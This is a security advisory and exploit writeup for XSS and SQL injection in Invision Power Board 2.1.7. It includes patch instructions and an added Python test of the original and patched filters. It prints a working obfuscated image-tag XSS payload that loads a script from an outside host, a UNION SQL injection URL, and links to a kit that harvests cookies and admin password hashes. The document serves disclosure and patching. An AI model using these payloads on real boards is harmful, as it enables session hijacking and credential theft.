Invision Power Board <= 2.1.7 ACTIVE XSS/SQL Injection Exploit

01 Jul 2014 00:00:00, reported by RootType. Source: seebug (www.seebug.org)

Invision Power Board 2.1.7 ACTIVE XSS/SQL Injection vulnerability and patch

Code

                                                ----[ INVISION POWER BOARD 2.1.7 EXPLOIT ... ITDefence.ru Antichat.ru ]

						INVISION POWER BOARD 2.1.7 ACTIVE XSS/SQL INJECTION
							Eugene Minaev [email protected]
				___________________________________________________________________
			____/  __ __ _______________________ _______  _______________    \  \   \
			/ .\  /  /_// //              /        \       \/      __       \   /__/   /
			/ /     /_//              /\        /       /      /         /     /___/
			\/        /              / /       /       /\     /         /         /
			/        /               \/       /       / /    /         /__       //\
			\       /    ____________/       /        \/    __________// /__    // /   
			/\\      \_______/        \________________/____/  2007    /_//_/   // //\
			\ \\                                                               // // /
			.\ \\        -[     ITDEFENCE.ru Security advisory     ]-         // // / . 
			. \_\\________[________________________________________]_________//_//_/ . .
		 
		----[ NITRO ... ]
		
		This vulnerability had been found before, but no public "fighting" (working) exploit 
		was available for it. This POC consists of several parts: an active XSS generator, 
		a JS file that is loaded when the page containing the XSS is visited, a log viewer, and a special component
		that pulls the necessary data from the forum's MySQL tables if the intercepted session
		belonged to a user with moderator privileges. 
		
		----[ ANALYSIS ... ]
		
		XSS.php is the most important part of the IPB 2.1.7 POC package, as it generates the XSS for 
		subsequent injection into the forum board. As the reference it is necessary to specify the full path 
		to the ya.js file (in which you have already corrected the path beforehand). Most likely 
		it is only necessary to press the button. 
		
		[img]http://www.ya.ru/[snapback]	onerror=script=document.createElement(String.fromCharCode(115,99,114,
		105,112,116)),script.src=/http:xxdaim.ruxmonzterxforum/.source.replace(/x/g,String.fromCharCode(47)),
		head=document.getElementsByTagName(String.fromCharCode(104,101,97,100)).item(0),head.appendChild(script)
		style=visibility:hidden	=[/snapback].gif[/img]
		
		The injection can be executed only when a session of a user with access to the 
		moderator's panel is available. The fix is to cast the "starter" parameter to an integer with the "intval" 
		function. In case of successful injection it is possible to enumerate the forum's administrator team:
		
		index.php?act=mod&f=-6&CODE=prune_finish&pergo=50&current=50&max=3&starter=1+union+select+1/*
		
		----[ RECORD ... ]
		{
		
			---IP ADDRESS	sniffed ip address
			---REFERER		xssed theme
			---COOKIES 		xssed cookies of forum member
			---USER ID		xssed user id of forum member
			---ADMIN NAME	admin username
			---ADMIN PASS	admin pass hash
			---ADMIN SALT	admin hash salt
			
		}
		
		----[ PATCH ... ]
		
		FILE 
			sources/classes/bbcode/class_bbcode_core.php
		FUNCTION
			regex_check_image
		LINE
			924
		REPLACE
			if ( preg_match( "/[?&;]/", $url) )
		ON
			if ( preg_match( "/[?&;\<\[]/", $url) ) 
			
			
		FILE
			sources/classes/bbcode/class_bbcode_core.php
		FUNCTION
			post_db_parse_bbcode
		LINE
			486
		REPLACE
			preg_match_all( "#(\[$preg_tag\])((?!\[/$preg_tag\]).+?)?(\[/$preg_tag\])#si", $t, $match );
		ON
			preg_match_all( "#(\[$preg_tag\])((?!\[/$preg_tag\]).+?)?(\[/$preg_tag\])#si", $t, $match );

			if ( $row['bbcode_tag'] == 'snapback' )
			{	
				$match[2][$i] = intval( $match[2][$i] );
			}  
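The two checks above, re-implemented in Python as an added example (this is not IPB code and not part of the advisory): the original and patched `regex_check_image` character filters are run over a constructed [img] URL shaped like the payload in the ANALYSIS section, and the patched `snapback` handling plus the `starter` fix are modelled with an approximation of PHP's `intval`. The payload string, `php_intval`, `sanitize_snapback` and `prune_where_clause` are assumptions made for illustration.

```python
import re

# Constructed test inputs (not taken from a live board). The malicious URL breaks out of
# the image tag with a nested [snapback] and an onerror handler, as the advisory describes.
MALICIOUS_IMG_URL = ("http://example.invalid/[snapback]\tonerror=alert(1)"
                     "\tstyle=visibility:hidden\t=[/snapback].gif")
BENIGN_IMG_URL = "http://example.invalid/images/logo.gif"

# Character filters from regex_check_image: the original only blocked '?', '&' and ';',
# so a URL built from '[' and '<' slipped through; the patch adds both characters.
ORIGINAL_IMG_RE = re.compile(r"[?&;]")
PATCHED_IMG_RE = re.compile(r"[?&;<\[]")


def image_url_rejected(url, pattern=PATCHED_IMG_RE):
    """True when the [img] URL is refused by the given character filter."""
    return bool(pattern.search(url))


def php_intval(value):
    """Approximation of PHP intval() on a string: leading integer or 0."""
    m = re.match(r"\s*[+-]?\d+", str(value))
    return int(m.group()) if m else 0


# post_db_parse_bbcode patch: the body of a [snapback] tag must be a post id, so it is
# coerced to an integer before the tag is rendered.
SNAPBACK_RE = re.compile(r"\[snapback\]((?:(?!\[/snapback\]).)+?)?\[/snapback\]", re.S | re.I)


def sanitize_snapback(text):
    return SNAPBACK_RE.sub(
        lambda m: "[snapback]%d[/snapback]" % php_intval(m.group(1) or ""), text)


def prune_where_clause(starter):
    """The 'starter' parameter from the prune_finish request, cast with intval before
    it reaches the SQL string, so only a number can ever be interpolated."""
    return "starter_id = %d" % php_intval(starter)


if __name__ == "__main__":
    print("original filter rejects payload:", image_url_rejected(MALICIOUS_IMG_URL, ORIGINAL_IMG_RE))
    print("patched filter rejects payload: ", image_url_rejected(MALICIOUS_IMG_URL))
    print("patched filter rejects benign:  ", image_url_rejected(BENIGN_IMG_URL))
    print(sanitize_snapback("[img]http://example.invalid/[snapback]\tonerror=alert(1)[/snapback].gif[/img]"))
    print(prune_where_clause("1 union select 1/*"))
```

Running the module shows the original filter letting the constructed payload through while the patched one refuses it, and shows the SQL clause collapsing `1 union select 1/*` to `starter_id = 1`.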
			
			
		
		www.underwater.itdefence.ru/isniff.rar
		www.exploit-db.com/sploits/2008-isniff.rar

----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]
OSVDB: 51280, 51281

# milw0rm.com [2008-01-05]

                              
